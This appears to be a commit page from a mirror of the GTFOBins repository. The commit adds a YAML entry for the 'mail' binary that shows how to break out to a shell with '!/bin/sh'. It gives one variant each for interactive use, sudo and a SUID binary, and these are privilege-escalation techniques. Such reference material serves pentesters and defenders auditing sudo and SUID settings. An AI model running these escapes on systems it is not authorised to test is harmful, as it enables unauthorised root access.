1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
This commit is contained in:
Emilio Pinna 2018-05-29 19:34:56 +01:00
parent 5e0da38a4a
commit 4fbd4d3ab7

15
_gtfobins/mail.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
execute-interactive:
- code: |
mail -f /etc/hosts
!/bin/sh
sudo-enabled:
- code: |
sudo mail -f /etc/hosts
!/bin/sh
suid-limited:
- code: |-
./mail -f /etc/hosts
!/bin/sh
---